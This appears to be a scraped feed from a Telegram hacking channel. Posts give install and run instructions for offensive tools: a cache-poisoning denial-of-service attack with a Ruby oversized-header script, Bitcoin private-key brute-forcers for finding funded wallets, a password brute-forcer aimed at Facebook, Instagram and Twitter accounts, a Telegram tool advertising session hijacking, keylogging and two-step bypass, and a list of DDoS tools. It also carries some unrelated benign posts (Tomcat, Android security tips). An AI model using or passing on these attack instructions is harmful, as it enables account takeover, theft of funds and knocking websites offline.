UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.7K links
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

Web & Services:
Undercode.help
Download Telegram
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑CPDoS: Cache Poisoned Denial of Service Ban Any Website 2019
Dangerous guide BY UnderCode
(t.me/UnderCodetestingOfficial)

🦑🅆🄷🄰🅃 🄸🅂 🄲🄿🄳🄾🅂?

> Cache-Poisoned Denial-of-Service (CPDoS) is a new class of web cache poisoning attacks aimed at disabling web resources and websites.

🦑How does it work?

1) The basic attack flow is described below and depicted in the following figure:

2) An attacker sends a simple HTTP request containing a malicious header targeting a victim resource provided by some web server. The request is processed by the intermediate cache, while the malicious header remains unobtrusive.

3) The cache forwards the request to the origin server as it does not store a fresh copy of the targeted resource. At the origin server, the request processing provokes an error due to the malicious header it contains.

4) As a consequence, the origin server returns an error page which gets stored by the cache instead of the requested resource.

5) The attacker knows that the attack was successful when she retrieved an error page in response.

6) Legitimate users trying to obtain the target resource with subsequent requests...

7) will get the cached error page instead of the original content.

🦑Installing & Run:
!) https://github.com/C-Python/cpdos

2) Go dir

3) Examples:

$ cpdos -site http://example.com/test/ 2>/dev/null

$ cPDosMAXPROCS=4096 cPDos -site http://example.com 2>/tmp/errlog Useful environment vars:

4) GOMAXPROCS Set it to number of your CPUs or higher (no more actual for latest golang versions). cPDosMAXPROCS Limit the connection pool (1024 by default).

5) HHO CPDoS attacks work in scenarios where a web application uses a cache that accepts a larger header size limit than the origin server. To attack such a web application, a malicious client sends a HTTP GET request including a header larger than the size supported by the origin server but smaller than the size supported by the cache. To do so, an attacker has two options. First, she crafts a request header with many malicious headers as shown in the following Ruby code snippet. The other option is to include one single header with an oversized key or value.

🦑Requirements:

require 'net/http'
uri = URI("https://example.org/index.html")
req = Net::HTTP::Get.new(uri)

num = 200
i = 0

# Setting malicious and irrelevant headers fields for creating an oversized header
until i > num do
req["X-Oversized-Header-#{i}"] = "Big-Value-0000000000000000000000000000000000"
i +=1;
end

res = Net::HTTP.start(uri.hostname, uri.port, :use_ssl => uri.scheme == 'https') {|http|
http.request(req)
}

w͓̽r͓̽i͓̽t͓̽t͓̽e͓̽n͓̽ ͓̽b͓̽y͓̽ ͓̽M͓̽r͓̽.͓̽ ͓̽B͓̽o͓̽t͓̽N͓̽e͓̽t͓̽ ͓̽(͓̽t͓̽.͓̽m͓̽.͓̽)͓̽
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑2019
A powerful client-side router.
NEW TOPIC ROUTER ATTCK BY UnderCode
(Instagram.com/UnderCodeTestingCompany)

🦑INSTALLING & RUN:

>This library can be used in the browser only.
Building The Code

1) git clone https://github.com/aurelia/router

2) This library can be used in the browser only.
Building The Code

3) cd router

4) npm install

5) To build the code, you can now run:

6) npm run build

7) You will find the compiled code in the dist folder, available in three module formats: AMD, CommonJS and ES6.

🦑How To Run:

1) To run the project in development mode, you can run:

> npm start

2) If you want to copy over the newly built bundle, you can specified --target:

> npm start -- --target ..\my-test-project

🦑Running The Tests:

1) To run the unit tests, first ensure that you have followed the steps above in order to install all dependencies and successfully build the library. Once you have done that, proceed with these additional steps:

2) Run the test script:

3) npm run test

4) With watch options to rerun the test (headless):

5) npm run test:watch

6) With watch options to rerun the test (with browser):

7) npm run test:debugger

ENJOY ALL NEW TUTORIALS 😊
w͓̽r͓̽i͓̽t͓̽t͓̽e͓̽n͓̽ ͓̽b͓̽y͓̽ ͓̽M͓̽r͓̽.͓̽ ͓̽B͓̽o͓̽t͓̽N͓̽e͓̽t͓̽ ͓̽(͓̽t͓̽.͓̽m͓̽.͓̽)͓̽
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
—————-UNDERCODE—————

🦑For All Virtuals Numbers lovers On whatsapp

> Wr Contact Mr. y Work to Fcb/Whatsapp Administor from 3 Months he told us That

>Whatsapp Adminsitors Create New Smart Script Called also Smart Script he work Shorlty To Disable all Fake Numbers Shortly Then In 2020 NO ONE CAN USE VITual Numbers Work To whatsapp

@ Mr. BotNet
—————\UNDERCODE—————-
Hack sms OTP THEORICAL UNDERCODE.pdf
1018 KB
-----Ṵ̷͓̅͐̽̍͝Ǹ̸͓͓͕͝Ḑ̴̮͙̗̺̜͍͙͛̈́̋̌͌͒͝Ȩ̷͓̭̤͍̯́͗̉̽̒R̸̨̛͓̹͉̉͆̓͗̈́C̸̫͙̭̪̕O̸͆͒̋̏̔̈́ ̤̞̘̝̭͍̫̻̭D̷̰̘̖͔̻͛͜Ȅ̵͔̲͈̆̈́̃̕------


🦑NEW FOR ALL Apache Users This official Plugin to manipulate Is Complement to your work : THE WAR PROJECT :
(T.me/UnderCodeTestingOfficial)

🦑Apache Tomcat Maven Plugin:

This is the new home for the Tomcat Maven Plugin (previously hosted at Codehaus).

🦑features:

1) Apache Tomcat7 support

2) Build an Executable War/Jar
More details in Generated changelog from issue tracker.

3) The Tomcat Maven Plugin provides goals to manipulate WAR projects within the Apache Tomcat servlet container.


🦑TO RUN:

1) run your war project with an embedded Apache Tomcat.

2) The run goals give you the opportunity to quickly develop your application without needing to install a standalone Tomcat instance.

3) More details and features: see documentation.


🦑groupId and Mojo name change

4) You must configure your pom to use this new groupId:
<pluginManagement>
<plugins>
<plugin>
<groupId>org.apache.tomcat.maven</groupId>
<artifactId>tomcat6-maven-plugin</artifactId>
<version>2.3-SNAPSHOT</version>
</plugin>
<plugin>
<groupId>org.apache.tomcat.maven</groupId>
<artifactId>tomcat7-maven-plugin</artifactId>
<version>2.3-SNAPSHOT</version>
</plugin>
</plugins>
</pluginManagement>
Or add the groupId in your settings.xml
<pluginGroups>
....
<pluginGroup>org.apache.tomcat.maven</pluginGroup>
....
</pluginGroups>

@ Mr. BotNet(tm)
-----UNDERCODE-----
-----UNDERCODE-----

We saw many Scamers Put The UnderCode Company Picture or Descriptions...

🦑PLEASE NOTE IN ENGLISH VERSIONS:

> UNDERCODE COMPANY USE ONLY +961 Phones Numbers
And thx



@̷̡̯͖͚̘̫̫͒͐̍̐͂̓̽͛͘͝ ̵̦̦̤̺̺̣̠͐̓́̃̍̏M̴̛̫̪͓̠̞̰̤͚̫̃̚ŗ̸̖͐̓̽̋̓̆͛͆̉͝.̶̛͆̚͝ ̛̄ ̡͈̤̟͙̹ ̶̙͕̘̠̬̟͚̮͛̒́̈̏̓̈́͘͝B̶̧̧̫̺̈ö̷̧̙̘̤̭̟͉́T̷͌̃ ͎̲́́̎́̇͌Ņ̸̛̰̤̯̰̱͈͙̈̍̓̍̃͗ͅÉ̸ ̨͇͙͚T̶̓̽̒̈́̈́͋̃ ̧͚̫͇(̵̥̝͕͖̯̈́t̷̼̠̓̽͌.̵̆͝͠ ̖͎͕̮̼͙̓m̶̢̢̟͑̌̐͌͗̅͝.̶̢̗͎̈́͐͌͗͆͛͋̕͝)̵̝͔͍̠̺͎̪̔̄́̌͑͝ͅ


-------UNDERCODE------
-----U̷̅N̸͝D̴͝É̷R̸̉C̸̕O̸͆ ̤̞D̷͛Ȅ̵------

🦑
A tool for cracking Bitcoin private keys NEW 2019 Full GUIDE:

(instagram.com/UnderCodeTestingCompany)

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ 𝔸ℕ𝔻 ℝ𝕌ℕ:

1) git clone https://github.com/brichard19/BitCrack

🦑Build dependencies

1) Visual Studio 2019 (if on Windows)

2) For CUDA: CUDA Toolkit 10.1

3) For OpenCL: An OpenCL SDK (The CUDA toolkit contains an OpenCL SDK).

🦑Building in Windows:

1) Open the Visual Studio solution.

2) Build the clKeyFinder project for an OpenCL build.

3) Build the cuKeyFinder project for a CUDA build.

4) Note: By default the NVIDIA OpenCL headers are used. You can set the header and library path for OpenCL in the BitCrack.props property sheet.

🦑Building in Linux:

1) Using make:

2) Build CUDA:

3) make BUILD_CUDA=1

4) Build OpenCL:

5) make BUILD_OPENCL=1

>Or build both:

6) make BUILD_CUDA=1 BUILD_OPENCL=1

🦑ℍ𝕆𝕎 ℝ𝕌ℕ:

>Examples

1-The simplest usage, the keyspace will begin at 0, and the CUDA parameters will be chosen automatically

2-xxBitCrack.exe 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH

3-Multiple keys can be searched at once with minimal impact to performance. Provide the keys on the command line, or in a file with one address per line

4-xxBitCrack.exe 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH 15JhYXn6Mx3oF4Y7PcTAv2wVVAuCFFQNiP 19EEC52krRUK1RkUAEZmQdjTyHT7Gp1TYT

5-To start the search at a specific private key, use the --keyspace option:

6-xxBitCrack.exe --keyspace 766519C977831678F0000000000 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH

7-The --keyspace option can also be used to search a specific range:

8-xxBitCrack.exe --keyspace 80000000:ffffffff 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH

9-To periodically save progress, the --continue option can be used. This is useful for recovering after an unexpected interruption:

10-xxBitCrack.exe --keyspace 80000000:ffffffff 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH
...
11-GeForce GT 640 224/1024MB | 1 target 10.33 MKey/s (1,244,659,712 total) [00:01:58]
^C

12-xxBitCrack.exe --keyspace 80000000:ffffffff 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH
...
13- GeForce GT 640 224/1024MB | 1 target 10.33 MKey/s (1,357,905,920 total) [00:02:12]

14-Use the -b, -t and -p options to specify the number of blocks, threads per block, and keys per thread.

15- xxBitCrack.exe -b 32 -t 256 -p 16 1FshYsUh3mqgsG29XpZ23eLjWV8Ur3VwH

w͓̽r͓̽i͓̽t͓̽t͓̽e͓̽n͓̽ ͓̽b͓̽y͓̽ ͓̽M͓̽r͓̽.͓̽ ͓̽B͓̽o͓̽t͓̽N͓̽e͓̽t͓̽ ͓̽(͓̽t͓̽.͓̽m͓̽.͓̽)͓̽

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
This media is not supported in your browser
VIEW IN TELEGRAM
- - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑Another Script for bitcoin users for Generate Bitcoin Private Keys and check them against blockexplorer.com
(t.me/UnderCodeTestingOfficial)

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ 𝔸ℕ𝔻 ℝ𝕌ℕ:

1) Clone this script - download it or in the terminal use git clone https://github.com/Frankenmint/PKGenerator_Checker/

2) Let's install some dependencies! pip install ecdsa hashlib base58 requests cfscrape

3) Navigate to the directory: cd PKGenerator_Checker

🦑Run it!

4) python PkMaker.py

🦑FEATURES:

1) A random 32 byte Number is generated and encoded into Hex - Basially a number between 1 and 2^256 OR if counting in decimal form: 115792089237316195423570985008687907853269984665640564039457584007913129639936. Then, that key is hashed a few times into a public address according to these standard rules and is fired off to blockexplorer.com using their API. The script then prints the balance to the console window.

2) use cfscraper to get around the issue of cloudflare on the v2 version of the script which uses bitcoinlist.io this version will scan an entire page at a time of keys..though idk if the underlying site is to be trusted (ie they just tell you the funds are zero and sweep the funds into their own wallet first)

3) ENJOY😁

w͓̽r͓̽i͓̽t͓̽t͓̽e͓̽n͓̽ ͓̽b͓̽y͓̽ ͓̽M͓̽r͓̽.͓̽ ͓̽B͓̽o͓̽t͓̽N͓̽e͓̽t͓̽ ͓̽(͓̽t͓̽.͓̽m͓̽.͓̽)͓̽

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑HACK TWITTER/Instagram 2018 via Simple script :
(Facebook.com/UnderCodeTestingCompanie)

🦑INSTALLISATION & RUN:

1) Open terminal and type

> git clone https://github.com/Juniorn1003/Faitagram/

2) cd Faitagram

3) python setup.py

🦑🅃🄾 🅁🅄🄽 :


>
Commands:


1) python faitagram -s [service] -u [username] -w [wordlist] -d [delay(Optional)]

2) We recommended to get any WorldList From wireshark official sites of from recently UnderCode Tutorials

🦑🄴🅇🄰🄼🄿🄻🄴🅂:


1) python faitagram -s facebook -u MeMeBigBoy@gmail.com -w /root/passwd.txt -d 10

(Execute faitagram) (facebook) (Email of the target) (wordlist path) (delay[10secs])


2) python faitagram -s instagram -u justin -w wlist

(Execute faitagram) (Instagram) (username) (wordlist)


3) python faitagram -s twitter -u hellohahahha -w wlist -d 3

(Execute faitagram) (Twitter) (Username) (wordlist) (delay[3secs])

🦑Pay Attention:



1) -s, -u, -w parameters are musts, and -d is optional.

-d in default is 1 sec.

2) In facebook, you would have to type the email in the -u.

3) In facebook, the script will ask you the Name of the target.


@̷̨̙̩͍̦̹̈ͅ ̵̯͙̭͔͊̄̈́̕͜͝ M̵̺̮͓̖͐̈́̓r̶̹̯̜͗͜.̷̡̺͇̄̍͒̀́̀͌̈́̄ ̸̠̐̌́̚͝B̵̧͈̓̇̈́̃͂͛́̑̄ơ̸̦̤̪͈͇̝̻͒͗̈͂͂ţ̴̥̖̬̟̲̥̯͖̑̔̒̉̀̓́̃̚̚N̸̠̼̭͚̮̜̻̤͘ȩ̸̧͈̭͉̱͊͋̏̏ͅṭ̷̖͎̤̖͙͑ͅ ̸̣̗̫͕̻̘̻͔̤̋ͅ(̴ ̺̖̥͔̞̪̬͎̘͚̅̈́̾̓ṯ̶̡͉̺̬̍̎̕.̷̨̡̛̐͋͊̑̉̒̅̍͝m̷̑̋͝ ̹̦̲̯̓̃̆)̵̨̧̛̞͈̟͖̞̰͇̟̈́͌̂̔͘


- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - U̷̅N̸͝D̴͝É̷R̸̉C̸̕O̸͆ ̤̞D̷͛Ȅ̵ - - - - -

🦑HACK TELEGRAM Updated TOPIC 2019 by UnderCode:
( t.me/UnderCodeTestingOfficial)

🦑Ⓘⓝⓢⓣⓐⓛⓛⓘⓢⓐⓣⓘⓞⓝ & Ⓡⓤⓝ :

(Windows/Linux/Termux)

1) git clone https://github.com/ultrasecurity/TeleKiller.git

2) cd TeleKiller

3) pip install -r requirements.txt

4) python TeleKiller.py

🦑Ⓕⓔⓐⓣⓤⓡⓔⓢ :

1) Session Hijacking

2) Stealer Local Passcode

3) Keylogger

4) Shell

5) Bypass 2 Step Verification

6) Bypass Av (Coming Soon)

🦑Ⓓⓔⓟⓔⓝⓓⓔⓝⓒⓨ:

1) python 2.7

>pkg install python

2) pyHook

3) pywin32
> For Windows Users

🦑Tested On :

1) Windows 10

2) Windows 8.1

3) Windows 8

4) Windows 7

@̷̈ ̵͊ M̵͐r̶͗.̷̄ ̸̐B̵̓o̸͒t̴̚N̸͘e̸͊t̷͑ ̸̋(̴ ̅̈́t̶̕.̷̐m̷̑ ̓̃)̵͘

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - U̷̅N̸͝D̴͝É̷R̸̉C̸̕O̸͆ ̤̞D̷͛Ȅ̵ - - - - -

🦑How to Make Android as Secure as Possible By UndercOde:
(instagram.com/UnderCodeTestingCompany)

🦑Le̲t̲s̲ ̲S̲t̲a̲r̲t̲:̲

1) Enable Two-Factor Authentication On Your Google Account

> A secure Android phone starts with a secure Google account, because that’s where all your synced data is stored—and the more Google services you use, the more crucial this step is.

> If you haven’t already, start by enabling two-factor authentication (2FA) on your Google account. There are several options for that second factor, be it a simple text message (which is inherently the least secure of all 2FA methods, but still better than nothing) to adding a U2F key like Google’s Titan Key bundle.

> You can find Google’s 2FA settings in My Account

> 2-Step Verification

2) Use a Secure Lock Screen

3) Make Sure Find My Phone is On

> Losing your phone is a gut-wrenching feeling, so you also want to make sure you have a way to track it and, worse case scenario, remotely reset your phone if there’s no chance of getting it back.

> Fortunately, Google has a tracking system in place for Android phones. It’s called Find My Phone, and it should be enabled by default on all modern Android phones. To double check, jump into Settings > Google > Security > Find My Phone.

4) Consider using apps that provide end-to-end encryption:

> This is entirely optional, as Android already has Gmail pre-installed (and emails might be the most sensitive information you transmit on your phone, outside of financial transactions). If you’re twitchy about your privacy when sending SMS messages, you may opt to use a third-party app to encrypt them. Apps such as Signal, Dust, Telegram, and WhatsApp (among others) could just be what you’re looking for.

5 ) Turn off Bluetooth and WiFi when you’re not using them:

> Doing so not only decreases the likelihood of mobile attacks (not to mention pranks) taking advantage of Bluetooth technology and WiFi, but it also helps with your smartphone’s battery life.

6) Be wary of (unofficial) apps that bank on other apps’ popularity, or on seasons and events:

> We’ve seen apps appear in the Play Store pretending to be something related to [famous app here], but cheaper, with more features, or some other too-good-to-be-true scenario. For example, WhatsApp is no stranger to copycat apps. In late November 2017,

> one supposed WhatsApp update used Unicode to slip under Google’s defenses. We’ve also seen fake apps that take advantage of popular events, like the Winter Olympics.

7) Weigh the odds when it comes to free public WiFi:

> Ah, coffee shop WiFi—to connect or not connect? Well, it depends. Is the WiFi you want to connect to even legitimate? Approach a coffee shop employee and ask for the WiFi’s name and password.

> If there’s a password, it’s a bit safer to connect. (If not, consider any browsing you do in the coffee shop to be open season for criminals.)


🦑 Things Google Already Does to Make Sure Your Phone is Secure:

1 ) Google Play Protect
Starting with Android 8.0 (Oreo), Google baked in a feature named Play Protect.

2 ) On-Device Encryption:

> In the earliest days of Android, encryption wasn’t even an option. Google added it later, though you had to enable it manually, and that was a hassle. These days, Android is encrypted by default on all modern devices, and you can’t turn it off.

Written By Mr. BotNet (t.m.)
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑NETWORKING TRICKS:
(t.me/UnderCodeTestingOfficial)

🦑🄻🄴🅃 🅂 🅂🅃🄰🅁🅃:

RDPY is an RDP Security Tool in Twisted Python with RDP Man in the Middle proxy support which can record sessions and Honeypot functionality.

> RDPY is a pure Python implementation of the Microsoft RDP (Remote Desktop Protocol) protocol (client and server side). RDPY is built over the event driven network engine Twisted. RDPY support standard RDP security layer, RDP over SSL and NLA authentication (through ntlmv2 authentication protocol).

🦑Ⓘⓝⓢⓣⓐⓛⓛⓘⓢⓐⓣⓘⓞⓝ & Ⓡⓤⓝ:

1) dOWNLOAD https://github.com/citronneur/rdpy/archive/v1.3.2.zip

2) unzip

3) RDPY Hacking RDP Binaries

open terminal and type fter going to dir

4) rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]
1

5) rdpy-rdpclient.py [-u username] [-p password] [-d domain] [-r rss_ouput_file] [...] XXX.XXX.XXX.XXX[:3389]

6) You can use rdpy-rdpclient in a Recorder Session Scenario, used in rdpy-rdphoneypot.
rdpy-vncclient

> rdpy-vncclient is a simple VNC Qt4 client.

7) rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]


8) rdpy-vncclient.py [-p password] XXX.XXX.XXX.XXX[:5900]

rdpy-rdpscreenshot

rdpy-rdpscreenshot saves login screen in file.
9) rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]


10) rdpy-rdpscreenshot.py [-w width] [-l height] [-o output_file_path] XXX.XXX.XXX.XXX[:3389]

rdpy-vncscreenshot

rdpy-vncscreenshot saves the first screen update in file.

11) rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]


12) rdpy-vncscreenshot.py [-p password] [-o output_file_path] XXX.XXX.XXX.XXX[:5900]

rdpy-rdphoneypot

rdpy-rdphoneypot is an RDP honey Pot. Use Recorded Session Scenario to replay scenario through RDP Protocol.

13) rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N

14) rdpy-rdphoneypot.py [-l listen_port] [-k private_key_file_path] [-c certificate_file_path] rss_file_path_1 ... rss_file_path_N

The private key file and the certificate file are classic cryptographic files for SSL connections. The RDP protocol can negotiate its own security layer. If one of both parameters are omitted, the server use standard RDP as security layer. You can specify more than one files to match more common screen size.

🦑 now rdpy-rssplayer:

> rdpy-rssplayer is use to replay Record Session Scenario (rss) files generates by either rdpy-rdpmitm or rdpy-rdpclient binaries.

15) rdpy-rssplayer.py rss_file_path


16 ) rdpy-rssplayer.py rss_file_path

Written by ̵͊ M̵͐r̶͗.̷̄ ̸̐B̵̓o̸͒t̴̚N̸͘e̸͊t̷͑ ̸̋(̴ ̅̈́t̶̕.̷̐m̷̑ ̓̃)̵͘

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -

🦑How To Add Firewall In Any Android:

> The method is quite simple and straight and you just need a cool Android app that will allow you to add the Firewall feature that will help you to ensure the security of your Android device
(instagram.com/UnderCodeTestingCompany)

🦑🄻🄴🅃🅂 🅂🅃🄰🅁🅃:

1) First of all, you need to download and install the cool android app that is NoRoot Firewall the app that will allow you to add firewall feature to your device.
> https://play.google.com/store/apps/details?id=app.greyshirts.firewall

2) Now you need to launch the app after installing it in your device. Now you need to click on “Start”

3) Now you need to allow the connection, simply tap on “OK” to continue

4) Now you need to move over the “Pending Access” tab and there you will see all the apps that require connecting to the internet. Simply allow them or deny them as per your wish

5) That’s it! you are done, now your Android has a Firewall that will be securing your device from various threats.

🦑Methode 2:

> Using Mobiwol:

Mobiwol NoRoot Firewall can be used to save battery, reduce data usage so you stay within your data plan, and secure your privacy by limiting the network access permissions required by apps.
> https://play.google.com/store/apps/details?id=com.netspark.firewall

1) First of all, you need to download and install Mobiwol on your Android device. Once installed, launch the app.

2) Now you will see the screen like below. Wait for few second until the app loads.

3) Now you need to turn on the Firewall Status.

4) Now it will ask you to grant the permission to set up a VPN connection that will allow the app to monitor the network traffic. Simply tap on “Ok” to continue.

5) Now in the next step, you need to tap on the Firewall Rules. There you will see all the apps that require connecting to the internet. Simply allow them or deny them as per your wish.

6) You can even set Firewall settings according to your wish.

7) So, this is how you can use Mobiwol to add a firewall to your Android device.

🦑SIMILARS:

1)#1DroidWall – Android Firewall
>https://play.google.com/store/apps/details?id=com.googlecode.droidwall.free&hl=de&gl=de

2) #2 NetGuard – no-root firewall
>https://play.google.com/store/apps/details?id=eu.faircode.netguard

3) #3 Firewall Gold
>https://play.google.com/store/apps/details?id=com.anstudios.androidfirewall&hl=de&gl=de

@̷̈ ̵͊ M̵͐r̶͗.̷̄ ̸̐B̵̓o̸͒t̴̚N̸͘e̸͊t̷͑ ̸̋(̴ ̅̈́t̶̕.̷̐m̷̑ ̓̃)̵͘

- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑Best DDos Tools 2019
(t.me/UnderCodeTestingOfficial)

🦑1) LOIC (Low Orbit Ion Canon)

> LOIC is one of the most popular DOS attacking tools freely available on the Internet. This tool was used by the popular hackers group Anonymous against many big companies’ networks last year. Anonymous has not only used the tool, but also requested Internet users to join their DDOS attack via IRC.

>https://sourceforge.net/projects/loic/

2) XOIC

> XOIC is another nice DOS attacking tool. It performs a DOS attack an any server with an IP address, a user-selected port, and a user-selected protocol. Developers of XOIC claim that XOIC is more powerful than LOIC in many ways


>http://anonhacktivism.blogspot.com/2017/11/new-xoic-ddos-tool-download.html

3) HULK (HTTP Unbearable Load King)

> HULK is another nice DOS attacking tool that generates a unique request for each and every generated request to obfuscated traffic at a web server. This tool uses many other techniques to avoid attack detection via known patterns.

> http://packetstormsecurity.com/files/112856/HULK-Http-Unbearable-Load-King.html

4) DDOSIM—Layer 7 DDOS Simulator
DDOSIM is another popular DOS attacking tool. As the name suggests, it is used to perform DDOS attacks by simulating several zombie hosts. All zombie hosts create full TCP connections to the target server.

> This tool is written in C++ and runs on Linux systems.

>These are main features of DDOSIM

🦑Features:
Simulates several zombies in attack
Random IP addresses
TCP-connection-based attacks
Application-layer DDOS attacks
HTTP DDoS with valid requests
HTTP DDoS with invalid requests (similar to a DC++ attack)
SMTP DDoS
TCP connection flood on random port
Download DDOSIM here: http://sourceforge.net/projects/ddosim/

> Read more about this tool here: http://stormsecurity.wordpress.com/2009/03/03/application-layer-ddos-simulator/

5) R-U-Dead-Yet:

> R-U-Dead-Yet is a HTTP post DOS attack tool. For short, it is also known as RUDY. It performs a DOS attack with a long form field submission via the POST method. This tool comes with an interactive console menu. It detects forms on a given URL and lets users select which forms and fields should be used for a POST-based DOS attack.

> Download RUDY: https://code.google.com/p/r-u-dead-yet/

6) Tor’s Hammer

> Tor’s Hammer is another nice DOS testing tool. It is a slow post tool written in Python. This tool has an extra advantage: It can be run through a TOR network to be anonymous while performing the attack. It is an effective tool that can kill Apache or IIS servers in few seconds.

> Download TOR’s Hammer here: http://packetstormsecurity.com/files/98831/

7) PyLoris:

> PyLoris is said to be a testing tool for servers. It can be used to perform DOS attacks on a service. This tool can utilize SOCKS proxies and SSL connections to perform a DOS attack on a server. It can target various protocols, including HTTP, FTP, SMTP, IMAP, and Telnet. The latest version of the tool comes with a simple and easy-to-use GUI. Unlike other traditional DOS attacking tools, this tool directly hits the service.

> Download PyLoris: http://sourceforge.net/projects/pyloris/

8) OWASP DOS HTTP POST
It is another nice tool to perform DOS attacks. You can use this tool to check whether your web server is able to defend DOS attack or not. Not only for defense, it can also be used to perform DOS attacks against a website.

> Download here: https://code.google.com/p/owasp-dos-http-post/

9) DAVOSET
>DAVOSET is yet another nice tool for performing DDOS attacks. The latest version of the tool has added support for cookies along with many other features. You can download DAVOSET for free from Packetstormsecurity.

> Download DavoSET: http://packetstormsecurity.com/files/123084/DAVOSET-1.1.3.html

10) GoldenEye HTTP Denial Of Service Tool
GoldenEye is also a simple but effective DOS attacking tool.
It was developed in Python for testing DOS attacks, but people also use it as hacking tool.
> Download GoldenEye: http://packetstormsecurity.com/files/120966/GoldenEye-HTTP-Denial-Of-Service-Tool.html

Written By Mr. BotNet (t.m.)
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - -

🦑iOS Apps Wireless Installation guide 2019 Lastest update:
(t.me/UnderCodeTestingOfficial)

🦑🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽:

1) git clone https://github.com/vineetchoudhary/AppBox-iOSAppsWirelessInstallation

2) You can install AppBox by running following command in your terminal -

> curl -s https://getappbox.com/install.sh | bash

🦑Manual install:

If you face any issue using above command then you can manually install AppBox by downloading it from here

>http://tryappbox.com/download
After that, unzip AppBox.app.zip and move AppBox.app into /Applications directory.

3) Link your Dropbox account with AppBox.

4) Select and upload the iOS application "OR" select project/workspace to archive and upload the iOS application.

5) Send the link to your testers, clients, friends or even use it yourself.

6) Open the link in the browser on the device and click on install.

🦑FEATURES:

> Auto App Signing

>rocket Auto Upload on Dropbox or AppStore after Archive

>link Keep same installation link for the same app

> paperclips Install previous version with same installation link

>email Auto E-Mail App Distribution Link
electric_plug Auto Shutdown Mac after Distribution

>package Maximum Upload Size - Equal to your Dropbox account storage

>date Uploaded App Expiration - Until you delete from your Dropbox
sparkles Unlimited app installations

>fire Auto Restart Upload After Network Change or Failure
tophat Easy setup assistant to get started in a few minutes

>wrench Slack, Microsoft Teams and Hangout Chat Webhook Integration

>kissing_heart Dashboard

>rocket Fastlane support read more

>ship Jenkins Support read more

>dark_sunglasses Dark Theme

Written By Mr. BotNet (t.m.)
- - - - - - U҉N҉D҉E҉R҉C҉O҉D҉E҉- - - - - -